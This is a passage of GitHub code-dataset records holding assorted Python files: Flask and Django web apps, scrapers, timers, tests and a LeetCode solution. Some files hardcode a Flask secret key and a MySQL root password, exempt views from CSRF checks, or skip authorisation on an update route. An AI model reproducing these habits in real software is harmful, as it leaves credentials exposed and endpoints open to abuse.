[]\n order.append(matrix[0][0])\n s = set()\n while not visited[pos[0]][pos[1]]:\n print(visited)\n visited[pos[0]][pos[1]] = True\n move = moves[direction]\n new_y = pos[0] + move[0]\n new_x = pos[1] + move[1]\n if 0 <= new_x < len(matrix[0]) and 0<=new_y < len(matrix) and not visited[new_y][new_x]:\n order.append(matrix[new_y][new_x])\n pos = [new_y, new_x]\n else:\n direction += 1\n direction %= 4\n move = moves[direction]\n new_y = pos[0] + move[0]\n new_x = pos[1] + move[1]\n if not (0 <= new_x < len(matrix[0]) and 0<= new_y < len(matrix)) or visited[new_y][new_x]:\n break\n order.append(matrix[new_y][new_x])\n pos = [new_y, new_x]\n return order\n","repo_name":"wilsonwid/leetcode","sub_path":"spiral-matrix/spiral-matrix.py","file_name":"spiral-matrix.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"8865074574","text":"from crypt import methods\nfrom flask_app import app\nfrom flask import render_template, redirect, session, flash, request\nfrom flask_app.models.user_model import User\nfrom flask_app.models.recipe_model import Recipe\n\n@app.route('/recipes/new')\ndef new_recipe_form():\n return render_template('recipe_new.html')\n\n@app.route(\"/recipes/create\", methods=['POST'])\ndef create_recipe():\n if 'user_id' not in session:\n return redirect('/')\n if not Recipe.validator(request.form):\n return redirect('/recipes/new')\n data = {\n \"name\" : request.form['name'],\n \"description\" : request.form['description'],\n \"instructions\" : request.form['instructions'],\n \"date\" : request.form['date'],\n \"time\" : request.form['time'],\n \"user_id\" : session['user_id']\n }\n Recipe.create(data)\n return redirect('/dashboard')\n\n@app.route('/recipes/')\ndef one_recipe(id):\n if 'user_id' not in session:\n return redirect('/')\n user_data = {\n 'id' : session['user_id']\n }\n logged_user = User.get_by_id(user_data)\n this_recipe = Recipe.get_by_id({'id' : id})\n return render_template('recipe_one.html', this_recipe=this_recipe, logged_user=logged_user)\n \n\n@app.route('/recipes//edit')\ndef edit_recipe(id):\n if 'user_id' not in session:\n return redirect('/')\n this_recipe = Recipe.get_by_id({'id' : id})\n return render_template('recipe_edit.html', this_recipe=this_recipe)\n\n@app.route('/recipes//update', methods=['POST'])\ndef update_recipe(id):\n if not Recipe.validator(request.form):\n return redirect(f'/recipes/{id}/edit')\n recipe_data = {\n **request.form, \n 'id' : id\n }\n Recipe.update(recipe_data)\n return redirect('/dashboard')\n\n@app.route('/recipes//delete')\ndef delete_recipes(id):\n this_recipe = Recipe.get_by_id({'id' : id})\n if not this_recipe.user_id == session['user_id']:\n flash(\"You can't remove a recipe you did not add\")\n return redirect('/dashboard')\n Recipe.delete({'id' : id})\n return redirect('/dashboard')","repo_name":"ErikMejiaCode/Assignments-Coding-Dojo","sub_path":"SQL/core/recipes/flask_app/controllers/recipes_controller.py","file_name":"recipes_controller.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26819240094","text":"# performance related topics\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport timeit\r\n\r\nprint(cv2.useOptimized())\r\n\r\nIMGDIR=\"D:/apidoc/python/OpenCV-3.2.0\"\r\ncv2.namedWindow('fish', cv2.WINDOW_NORMAL)\r\nimg = cv2.imread(IMGDIR + os.sep + \"roi.jpg\", )\r\ncv2.setUseOptimized(False)\r\nt1 = cv2.getTickCount()\r\ncv2.medianBlur(img,49)\r\nt2 = cv2.getTickCount()\r\n\r\ncv2.setUseOptimized(False)\r\ncv2.medianBlur(img,49)\r\ncv2.setUseOptimized(True)\r\nt3 = cv2.getTickCount()\r\ncv2.medianBlur(img,49)\r\nt4 = cv2.getTickCount()\r\n\r\ntm = timeit.Timer(\"cv2.medianBlur(img,49)\", 'import cv2\\nimport os\\nIMGDIR=\"D:/apidoc/python/OpenCV-3.2.0\"\\nimg = cv2.imread(IMGDIR + os.sep + \"roi.jpg\", )\\ncv2.setUseOptimized(False)').timeit(20)\r\nprint(tm)\r\ntm = timeit.Timer(\"cv2.medianBlur(img,49)\", 'import cv2\\nimport os\\nIMGDIR=\"D:/apidoc/python/OpenCV-3.2.0\"\\nimg = cv2.imread(IMGDIR + os.sep + \"roi.jpg\", )\\ncv2.setUseOptimized(True)').timeit(20)\r\nprint(tm)\r\nprint(t2 - t1, t3 - t2, t4 - t3)\r\n","repo_name":"staugust/leetcode","sub_path":"python/opcv/cp11.py","file_name":"cp11.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20160788071","text":"import appdaemon.plugins.hass.hassapi as hass\r\n\r\nfrom dateutil import parser\r\n\r\n\r\nclass DailyReactivationTimer(hass.Hass):\r\n current_timer_handle = None\r\n\r\n def initialize(self):\r\n self.listen_state(self.start_timer,\r\n self.args[\"observed_input_datetime\"])\r\n self.listen_state(self.start_timer,\r\n self.args[\"observed_input_boolean\"])\r\n\r\n def start_timer(self, entity, attribute, old, new, kwargs):\r\n time_string = self.get_state(self.args[\"observed_input_datetime\"])\r\n reactivation_time = parser.parse(time_string)\r\n timer_callback = self.run_daily(self.reactivate_input_bool,\r\n reactivation_time.time())\r\n if self.current_timer_handle:\r\n self.cancel_timer(self.current_timer_handle)\r\n self.current_timer_handle = timer_callback\r\n\r\n def reactivate_input_bool(self, kwargs):\r\n self.log(\"Reactivated: \" + str(self.args[\"observed_input_boolean\"]))\r\n self.turn_on(self.args[\"observed_input_boolean\"])\r\n\r\n\r\nclass ReactivationTimer(hass.Hass):\r\n current_timer_handle = None\r\n\r\n def initialize(self):\r\n self.listen_state(self.start_timer,\r\n self.args[\"observed_input_boolean\"], new=\"off\")\r\n self.listen_state(self.stop_timer,\r\n self.args[\"observed_input_boolean\"], new=\"on\")\r\n\r\n def start_timer(self, entity, attribute, old, new, kwargs):\r\n time_string = self.get_state(self.args[\"reactivation_timeout\"])\r\n timer_interval_datetime = parser.parse(time_string)\r\n\r\n timer_interval_in_seconds = timer_interval_datetime.hour * 60 * 60 + \\\r\n timer_interval_datetime.minute * 60 + timer_interval_datetime.second\r\n\r\n self.current_timer_handle = self.run_in(\r\n self.reactivate_input_bool, timer_interval_in_seconds)\r\n\r\n def stop_timer(self, entity, attribute, old, new, kwargs):\r\n self.cancel_timer(self.current_timer_handle)\r\n\r\n def reactivate_input_bool(self, kwargs):\r\n self.log(\"Reactivated: \" + str(self.args[\"reactivation_timeout\"]))\r\n self.turn_on(self.args[\"observed_input_boolean\"])\r\n","repo_name":"Robert1991/appdaemon","sub_path":"apps/general/input_boolean.py","file_name":"input_boolean.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4005748283","text":"#'/home/pc/Downloads/bt.css'\n#'/home/pc/Music/texto.txt'\n#\"192.168.1.10\"\nimport requests \nimport json\nimport random\nclass Consola():\n def Ejecutar(self):\n self.lista_usr=['Liam','Olivia',\n 'Noah','Emma',\n 'Oliver','Ava',\n 'William','Sophia',\n 'Elijah','Isabella',\n 'James','Charlotte',\n 'Benjamin','Amelia',\n 'Lucas','Mia',\n 'Mason','Harper',\n 'Ethan','Evelyn'\n ]\n self.cadena=None\n self.ip=None\n while True:\n print(\"Aplicacion De Escritorio\")\n print(\"1) Ingresar Ruta Archivo\")\n print(\"2) Ingresar ip \")\n print(\"3) Ver Datos \")\n print(\"4) Enviar Datos \")\n print(\"5) Salir \")\n \n entrada = input(\"Ingresar Opcion \\n\")\n if entrada == 1:\n self.Uno()\n elif entrada == 2:\n self.Dos()\n elif entrada == 3:\n self.Tres()\n elif entrada == 4:\n self.Cuatro()\n elif entrada == 5:\n self.Cinco()\n \n\n def Uno(self):\n entrada = input(\"Ingresar Ruta Del Archivo\")\n try:\n archivo = open(entrada,\"r\") \n self.cadena =archivo.read()\n print(\"Archivo Cargado A Memoria\")\n except:\n print(\"Error Ruta Incorrecta\")\n \n def Dos(self):\n entrada = input(\"Ingresar Direccion ip \\n\")\n self.ip = entrada\n\n def Tres(self):\n print(self.cadena)\n print(\"\\n\")\n \n def Cuatro(self):\n try:\n puerto = \":5050\"\n \n if self.ip is None:\n print(\"No Se Ingreso Una ip\")\n return \n if self.cadena is None or self.cadena ==\"\":\n print(\"No Se Ingreso Un Mensaje Para Enviar\")\n return \n linea = self.cadena.split(\"\\n\")\n for msg in linea:\n usuario = random.choice(self.lista_usr)\n if msg != \"\":\n jison ={\"usuario\":usuario,'mensaje':msg}\n response = requests.post(\"http://\"+self.ip+puerto+\"/server\",\n params=jison)\n print(response.json())\n\n print(\"---------------------TERMINADO---------------------------\")\n input(\"\")\n except :\n print(\"Error De Conexion Con El Servidor\") \n def Cinco(self):\n exit()\n\n\n\n\napp = Consola()\napp.Ejecutar()","repo_name":"esnorki2008/SistemasOperativos1","sub_path":"Proyecto1/ClienteEscritorio/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17758176773","text":"from app import db\n\n\nclass Count(db.Document):\n model = db.StringField()\n count = db.IntField()\n\n @classmethod\n def get_number(cls, model):\n model_name = model.__name__.lower()\n count = Count.objects(model=model_name).first()\n if not count:\n count = Count(\n model=model_name,\n count=10000,\n )\n count.save()\n return count.count\n else:\n number = count.count + 1\n count.update(count=number)\n return number\n","repo_name":"kohihi/cutedog","sub_path":"model/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9993080198","text":"import logging\nimport os\n\ndef get_logger(args):\n # create logger\n logger = logging.getLogger(\"MAIN\")\n logger.setLevel(logging.DEBUG)\n\n # create formatter\n BASIC_FORMAT = \"[%(asctime)s]-[%(levelname)s]\\t%(message)s\"\n DATE_FORMAT = '%Y-%m-%d %H:%M:%S'\n formatter = logging.Formatter(BASIC_FORMAT, DATE_FORMAT)\n\n # create consle handler and set level to DEBUG\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n ch.setLevel(logging.DEBUG)\n logger.addHandler(ch)\n # create file handler and set level to WARNING\n log_file = os.path.join(args.save_dir, \"log\")\n if not os.path.exists(os.path.dirname(log_file)):\n os.makedirs(os.path.dirname(log_file))\n print(\"Log save to %s\" % log_file)\n fh = logging.FileHandler(filename=log_file)\n fh.setFormatter(formatter)\n fh.setLevel(logging.INFO)\n logger.addHandler(fh)\n\n return logger","repo_name":"zzz47zzz/CET","sub_path":"utils/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"73886286645","text":"from pathlib import Path\n\nimport pytest\n\nfrom movici_simulation_core.messages import (\n AcknowledgeMessage,\n ClearDataMessage,\n DataMessage,\n ErrorMessage,\n GetDataMessage,\n NewTimeMessage,\n PathMessage,\n PutDataMessage,\n QuitMessage,\n RegistrationMessage,\n ResultMessage,\n UpdateMessage,\n UpdateSeriesMessage,\n dump_message,\n load_message,\n)\n\n\n@pytest.mark.parametrize(\n \"message\",\n [\n RegistrationMessage(pub={\"a\": None}, sub={\"b\": None}),\n UpdateMessage(1, \"key\", \"address\"),\n UpdateMessage(1, \"key\", \"address\", origin=\"some_model\"),\n UpdateMessage(1, None, None),\n UpdateSeriesMessage(updates=[UpdateMessage(1, None, None), UpdateMessage(1, \"a\", \"b\")]),\n ResultMessage(\"key\", \"address\", next_time=1),\n ResultMessage(None, None, None),\n NewTimeMessage(1),\n AcknowledgeMessage(),\n QuitMessage(),\n GetDataMessage(\"key\", {\"some\": \"filter\"}),\n PutDataMessage(\"key\", b\"some_data\"),\n ClearDataMessage(\"key\"),\n DataMessage(b\"some_data\"),\n ErrorMessage(),\n PathMessage(path=Path(\"/some/path\")),\n PathMessage(path=None),\n ],\n)\ndef test_serialization_deserialization(message):\n assert message == load_message(*dump_message(message))\n\n\ndef test_dump_update_message():\n assert dump_message(UpdateMessage(1, None, None, origin=\"some_model\")) == [\n b\"UPDATE\",\n b'{\"timestamp\": 1, \"key\": null, \"address\": null, \"origin\": \"some_model\"}',\n ]\n\n\ndef test_dump_update_series():\n assert dump_message(\n UpdateSeriesMessage(\n updates=[\n UpdateMessage(1, None, None),\n UpdateMessage(2, \"some_key\", \"some_address\"),\n ]\n )\n ) == [\n b\"UPDATE_SERIES\",\n b'{\"timestamp\": 1, \"key\": null, \"address\": null, \"origin\": null}',\n b'{\"timestamp\": 2, \"key\": \"some_key\", \"address\": \"some_address\", \"origin\": null}',\n ]\n\n\ndef test_load_update_series_message():\n assert load_message(\n *[\n b\"UPDATE_SERIES\",\n b'{\"timestamp\": 1, \"key\": null, \"address\": null, \"origin\": null}',\n b'{\"timestamp\": 2, \"key\": \"some_key\", \"address\": \"some_address\", \"origin\": null}',\n ]\n ) == UpdateSeriesMessage(\n updates=[\n UpdateMessage(1, None, None),\n UpdateMessage(2, \"some_key\", \"some_address\"),\n ]\n )\n\n\ndef test_dump_put_data_message():\n assert dump_message(PutDataMessage(\"key\", b\"data\")) == [b\"PUT\", b\"key\", b\"data\"]\n\n\ndef test_dump_update_data_message():\n assert dump_message(DataMessage(b\"some_data\")) == [b\"DATA\", b\"some_data\"]\n\n\ndef test_error_on_invalid_message_content():\n with pytest.raises(ValueError):\n ResultMessage(key=None, address=\"something\")\n\n\ndef test_update_series_message_has_no_timestamp_when_emtpy():\n assert UpdateSeriesMessage([]).timestamp is None\n","repo_name":"nginfra/movici-simulation-core","sub_path":"tests/networking/test_messages.py","file_name":"test_messages.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16379401125","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom authentication.tests.test_jwt import AuthenticationTest\nfrom rest_framework.test import APITestCase\nfrom rest_framework.test import APIClient\nfrom factor.models import Factor\n\n\nclass FactorAppTest(AuthenticationTest, APITestCase):\n\n def setUp(self):\n\n # if you want use force authenticate:\n self.me = super().setUp()\n self.client = APIClient()\n self.client.force_authenticate(user=self.me)\n\n # if want to use by token call, use like below:\n # super().test_api_jwt()\n # self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.tkn['access'])\n\n self.factor = Factor.objects.create(Description='XYZ',\n UserAddress='T234',\n ShipPrice=85.2,\n UserId=self.me)\n\n self.factor.save()\n # Factor management urls:\n self.create_read_url = reverse('factor_operation-list')\n self.read_partial_delete_url = reverse('factor_operation-detail', kwargs={'pk': self.factor.FactorId})\n\n # admin control over Factor:\n def test_factor_list(self):\n \"\"\" render factors list\n Method : GET\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n response = self.client.get(self.create_read_url)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_factor_create(self):\n \"\"\" create new factor\n Method : POST\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n post = {'Description': 'XYZ',\n 'UserAddress': 'T234',\n 'ShipPrice': 85.2,\n 'UserId': self.me.pk}\n\n response = self.client.post(self.create_read_url, post)\n self.assertEquals(response.status_code, 201)\n\n def test_factor_detail(self):\n \"\"\" Get factor over FactorId as PK\n Method : GET/PK/\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n response = self.client.get(self.read_partial_delete_url)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_factor_update(self):\n \"\"\" Update factor record over FactorId ad PK\n Method : PUT/PK/\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n data = {'Description': 'XYZe',\n 'UserAddress': 'Tw234',\n 'ShipPrice': 86.2,\n 'UserId': self.me.pk}\n\n response = self.client.put(self.read_partial_delete_url, data=data)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_factor_partial_update(self):\n \"\"\" Particular update factor record over FactorId ad PK\n Method : PATCH/PK/\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n data = {'Description': 'please send in Gift packet'}\n\n response = self.client.patch(self.read_partial_delete_url, data=data)\n self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n def test_factor_delete(self):\n \"\"\" Delete factor record over FactorId as PK\n Method : DELETE/PK/\n Permission : IsAdmin\n Authentication : IsAuthenticated\n \"\"\"\n response = self.client.delete(self.read_partial_delete_url)\n self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)\n\n\n\n","repo_name":"H4medRostami/Kirpi","sub_path":"factor/tests/test_factor.py","file_name":"test_factor.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"9206489225","text":"\ndef load_gain_data(gain_data_file = 'gain_data.txt'):\n '''\n load the gain map:\n [('-30', 0x2072), ...]\n '''\n f = open(gain_data_file)\n result = [] \n for line in f.readlines():\n if line.strip():\n key, value = line.split('\\t')\n result.append([key, eval(value)])\n f.close()\n return result\n","repo_name":"mmjang/p440_pyqt","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19807728258","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging; logging.basicConfig(level=logging.INFO)\n#一行中书写多条句必须使用���号分隔每个语句,否则Python无法识别语句之间的间隔\nimport asyncio, os, json, time\nfrom datetime import datetime\n\nfrom aiohttp import web\n\ndef index(request):\n\treturn web.Response(text='

    你好!妳好(繁體字)

    ', content_type='text/html',charset='utf-8')\n#GB2312是中国规定的汉字编码,简体中文的字符集编码,\n#GBK是GB2312的扩展 ,兼容GB2312、显示繁体中文、日文的假名\n#UTF-8是全世界通用的\n\n@asyncio.coroutine\ndef logger_factory(app, handler):\n\t@asyncio.coroutine\n\tdef logger(request):\n\t\t#记录日志\n\t\tlogging.info('Request: %s %s' % (request.method, request.path))\n\t\t#继续处理请求\n\t\treturn (yield from handler(request))\n\treturn logger\n\n@asyncio.coroutine\ndef response_factory(app, handler):\n\t@asyncio.coroutine\n\tdef response(request):\n\t\t#结果\n\t\tr = yield from handler(request)\n\t\tif isinstance(r, web.StreamResponse):\n\t\t\treturn r\n\t\tif isinstance(r, bytes):\n\t\t\tresp = web.Response(body=r)\n\t\t\tresp.content_type = 'application/octet=stream'\n\t\t\treturn resp\n\t\tif isinstance(r, str):\n\t\t\tif r.startswith('redirect:'):\n\t\t\t\treturn web.HTTPFound(r[9:])\n\t\t\tresp = web.Response(body=r.encode('utf-8'))\n\t\t\tresp.content_type = 'text/html;charset=utf-8'\n\t\t\treturn resp\n\t\tif isinstance(r, dict):\n\t\t\ttemplate = r.get('__template__')\n\t\t\tif template is None:\n\t\t\t\tresp = web.Response(body=json.dumps(r, ensure_ascii=False, default=lambda o: o.__dict__).encode('utf-8'))\n\t\t\t\tresp.content_type = 'application/json;charset=utf-8'\n\t\t\t\treturn resp \n\t\t\telse:\n\t\t\t\tresp = web.Response(body=app['__template__'].get_template(template).render(**r).encode('utf-8'))\n\t\t\t\tresp.content_type = 'text/html;charset=utf-8'\n\t\t\t\treturn resp\n\t\tif isinstance(r, int) and r >= 100 and r < 60:\n\t\t\treturn web.Response(r)\n\t\tif isinstance(r, tuple) and len(r) == 2:\n\t\t\tt, m = r\n\t\t\tif isinstance(t, int) and t >= 100 and t < 600:\n\t\t\t\treturn web.Response(t, str(m))\n\t\t#default\n\t\tresp = web.Response(body=str(r).encode('utf-8'))\n\t\tresp.content_type = 'text/plain;charset=utf-8'\n\t\treturn resp\n\treturn response\n\n\n\n@asyncio.coroutine\ndef init(loop):\n\tapp = web.Application(loop=loop, middlewares=[logger_factory, response_factory])\n\tinit_jinja2(app, filters=dict(datetime=datetime_filter))\n\tadd_routes(app, 'handlers')\n\tadd_static(app)\n\tapp.router.add_route('GET', '/', index)\n\tsrv = yield from loop.create_server(app.make_handler(), '127.0.0.1', 9000)\n\tlogging.info('server started at http://127.0.0.1:9000...')\n\treturn srv\n#获取EventLoop:\nloop = asyncio.get_event_loop()\n#执行coroutine\nloop.run_until_complete(init(loop))\nloop.run_forever()\n\n","repo_name":"zcy12321/awesone-python-webapp","sub_path":"www/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23864896486","text":"from flask import Flask, render_template, flash, redirect, url_for\nfrom forms import CmdForm, LoadForm, RecipeForm\nimport sys\nimport json\nimport time\nimport argparse\nimport requests\n\n\nimport google_auth\nimport dynamorecipelist\nimport brewque\n\n\nRECIPE_CHOICES=[('porter','porter'),('saison','saison'),('IPA','IPA'),('NEIPA','NEIPA'),('wit','wit')]\n\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'cEumZnHA5QvxVDNXfazEDs7e6Eg368yD'\napp.register_blueprint(google_auth.app)\n\n@app.route('/')\n@app.route('/index')\ndef index():\n if google_auth.is_logged_in():\n user_info = google_auth.get_user_info()\n else:\n user_info = None\n return render_template('index.html', title='Home', user=user_info)\n\n@app.route('/cmd', methods=['GET', 'POST'])\ndef cmd():\n if not google_auth.is_logged_in():\n return (redirect('/'))\n current_state = bq.get_state()\n form = CmdForm(command=current_state)\n\n if form.validate_on_submit():\n print('Got command {}'.format(form.command.data))\n if form.command.data in ['terminate','pause','run', 'stop', 'skip']:\n try:\n data = bq.put_command(form.command.data)\n except:\n print('Can not communicate with controller')\n return render_template('cmd.html', title='Command', form=form)\n\n@app.route('/status')\ndef status():\n if not google_auth.is_logged_in():\n return (redirect('/'))\n current_status = bq.get_controller_status()\n return render_template('status.html', title='Status', current_status = current_status)\n\n\n@app.route('/list', methods=['GET', 'POST'])\ndef list():\n if not google_auth.is_logged_in():\n return (redirect('/'))\n equipmentname = bq.get_equipmentname()\n dynamorl.set_equipmentname(equipmentname)\n recipeNameList = dynamorl.get_recipeNameList()\n recipeTupleList = []\n for recipename in recipeNameList:\n recipeTuple = (recipename, recipename)\n recipeTupleList.append(recipeTuple)\n\n # This should come from brewque\n current_recipe = bq.get_recipename()\n form = RecipeForm(recipe=current_recipe)\n form.recipe.choices = recipeTupleList\n\n if form.validate_on_submit():\n print('Got Recipe {}'.format(form.recipe.data))\n recipe2load = dynamorl.get_loadable_recipe(form.recipe.data, equipmentname)\n print('Recipe to load: {}'.format(recipe2load))\n try:\n print('Load recipe here')\n bq.put_recipe(recipe2load)\n except:\n print('Can not communicate with controller')\n #return redirect(url_for('index'))\n print('rerendering')\n #time.sleep(4)\n return render_template('recipe.html', title='Recipe', form=form)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-m\", \"--mqtt\", action='store_true', help='Use mqtt communication')\n group.add_argument(\"-a\", \"--aws\", action='store_true', help='Use aws mqtt communication')\n args = parser.parse_args()\n\n if args.mqtt:\n bq = brewque.brewque(connection='localhost')\n if args.aws:\n bq = brewque.brewque(connection='aws')\n\n\n # Wait for a message to appear\n time.sleep(2)\n dynamorl = dynamorecipelist.dynamorecipelist(bq.get_equipmentname())\n\n app.run(host='0.0.0.0', port=8080)\n","repo_name":"cloudymike/hopitty","sub_path":"src/hopfront/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6135329824","text":"#-*- coding:utf-8 -*-\n# import movies as movies\nimport requests\nimport sys\nimport os\nimport time\nfrom lxml import etree\nimport pymysql\n# douban_txt=open(\"豆瓣电影250.txt\", 'w+', encoding='utf-8')\ndef douban():\n for i in range(10):\n url = 'https://movie.douban.com/top250?start={}&filter='.format(i * 25) #总共10页,用 i*25 保证已25为单位递增\n data = requests.get(url).text#使用get方法发送请求,返回网页数据的Response并存储到对象data 中\n m = etree.HTML(data)##用etree.HTML 来解析变量data(页面数据)\n movie = m.xpath('//*[@id=\"content\"]/div/div[1]/ol/li/div') #定位到主盒子\n for div in movie:\n movie_name = div.xpath('./div[2]/div[1]/a/span[1]/text()')[0]\n movie_pingfen = div.xpath('./div[2]/div[2]/div/span[2]/text()')[0]\n movie_pingjia = div.xpath('./div[2]/div[2]/div/span[4]/text()')[0]\n movie_brief = div.xpath('./div[2]/div[2]/p[2]/span/text()')\n # print (\"电影名称{}——电影评分:{}——评价人数:{}——简介:{}\".format(movie_name,movie_pingfen,movie_pingjia,movie_brief))\n # return movie_name,movie_pingfen,movie_pingjia,movie_brief\n #将数据存入数据库\n db = pymysql.connect(host='192.168.100.29', user='root', password='ms123456', port=3306)\n cursor = db.cursor() # 获取游标\n sql = 'insert into douban.douban_movie(movie_name,movie_pingfen,movie_pingjia,movie_brief) values (%s,%s,%s,%s)'\n try:\n cursor.execute(sql, (movie_name, movie_pingfen, movie_pingjia, movie_brief))\n db.commit()\n except:\n db.rollback()\n db.close()\n #存入本地txt文本\ndouban()\n# db = pymysql.connect(host='192.168.100.29',user='root', password='ms123456', port=3306)\n# cursor = db.cursor()#获取游标\n# sql='CREATE TABLE douban.douban_movie (id INT(50) not null,movie_name VARCHAR(100) not null,movie_pingfen VARCHAR(100),movie_pingjia VARCHAR(100),movie_brief VARCHAR( 100 ),PRIMARY key( id ))'\n# sql='insert into douban.douban_movie(movie_name,movie_pingfen,movie_pingjia,movie_brief) values (%s,%s,%s,%s)'\n# try:\n # cursor.execute(sql,(movie_name,movie_pingfen,movie_pingjia,movie_brief))\n # db.commit()\n# except:\n# db.rollback()\n# data = cursor.fetchall()\n# print(data)\n# db.close()","repo_name":"mashenggg/python_v1","sub_path":"douban/douban_movie.py","file_name":"douban_movie.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38127039765","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom .models import Friendship\nfrom Accounts.models import CustomUser\nfrom django.views.decorators.csrf import csrf_exempt\n\n# Create your views here.\n\n\n@csrf_exempt\ndef add_friend(request):\n from_user = request.POST[\"from\"]\n to_user = request.POST[\"to\"]\n friendship = Friendship.objects.filter(\n from_user=from_user, to_user=to_user)\n if friendship.count() != 0:\n return JsonResponse(\"Friend already exists\", safe=False)\n user1 = CustomUser.objects.get(id=from_user)\n user2 = CustomUser.objects.get(id=to_user)\n create_friendship = Friendship(from_user=user1, to_user=user2)\n create_friendship.save()\n return JsonResponse(\"Friend Added Successfully\", safe=False)\n\n\n@csrf_exempt\ndef get_all_friends_of_user(request):\n userId = request.POST[\"userId\"]\n userobj = CustomUser.objects.get(id=userId)\n from_user_side = Friendship.objects.filter(from_user=userobj)\n sent_to_user = Friendship.objects.filter(to_user=userobj)\n print(from_user_side)\n print(sent_to_user)\n\n friendlist = []\n\n for usr in from_user_side.iterator():\n user_to_add = CustomUser.objects.get(id=usr.to_user.id)\n friendlist.append(user_to_add)\n for usr in sent_to_user.iterator():\n user_to_add = CustomUser.objects.get(id=usr.from_user.id)\n friendlist.append(user_to_add)\n print(friendlist)\n\n # REMINDER : In future create this get friend functionality as a function and not a view because it will be used in many different views for different purpose\n # For now returning empty object\n\n return JsonResponse({}, safe=False)\n","repo_name":"Vrundan28/MovieRecommendationSystem","sub_path":"MovieRecommendationApp/Friends/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72585129524","text":"import pandas as pd\r\nimport requests as r\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom selenium import webdriver\r\n#driver = webdriver.Firefox(executable_path=\"D://geckodriver.exe\")\r\nimport re\r\nimport time\r\nfrom pymongo import MongoClient as client\r\nfrom newspaper import Article\r\nclass times_of_india():\r\n def __init__(self,content,svc=\"mongodb://localhost:27017/\",driver=\"D://geckodriver.exe\",pagefrom=1,pageto=5):\r\n self.svc=svc\r\n self.content=content\r\n self.driver = webdriver.Firefox(executable_path=driver)\r\n self.driver.set_window_position(0, 0)\r\n self.pagefrom = int(pagefrom)\r\n self.pageto = int(pageto)\r\n def get_sub_links(self):\r\n print(\"Init-Sub-category\")\r\n l=set()\r\n page = r.get(\"https://timesofindia.indiatimes.com/\"+self.content)\r\n soup = bs(page.content,\"html.parser\")\r\n l=set()\r\n for i in soup.find(\"nav\").find_all(\"a\",href=True):\r\n if re.search(\"/\"+self.content+\"/*\",i['href']):\r\n l.add(\"https://timesofindia.indiatimes.com\"+i['href'])\r\n return l\r\n def get_full_links(self):\r\n print(\"Init-Get-Links\")\r\n l=set()\r\n links = self.get_sub_links()\r\n for j in links:\r\n page = r.get(j)\r\n soup=bs(page.content,'html.parser')\r\n try:\r\n for i in soup.find(\"div\",{\"class\":re.compile('main-content*')}).find_all(\"a\",href=True):\r\n \r\n try:\r\n if i['href'].split('.')[-1]=='cms':\r\n if i['href'].split(\"/\")[0]==\"https:\":\r\n l.add(i['href'])\r\n else:\r\n l.add(\"https://timesofindia.indiatimes.com\"+i['href'])\r\n except:\r\n pass\r\n except:\r\n pass\r\n return l\r\n def get_content(self):\r\n link = list(self.get_full_links())\r\n print(\"Started Fetching\")\r\n l=[]\r\n for i in link[self.pagefrom:self.pageto]:\r\n try:\r\n print(i)\r\n d={}\r\n d['Link']=i\r\n page = r.get(i)\r\n d['Content'] = bs(page.content,'html.parser').find(\"div\",{\"class\":re.compile(\"ga-headlines\")}).text\r\n self.driver.get(i)\r\n 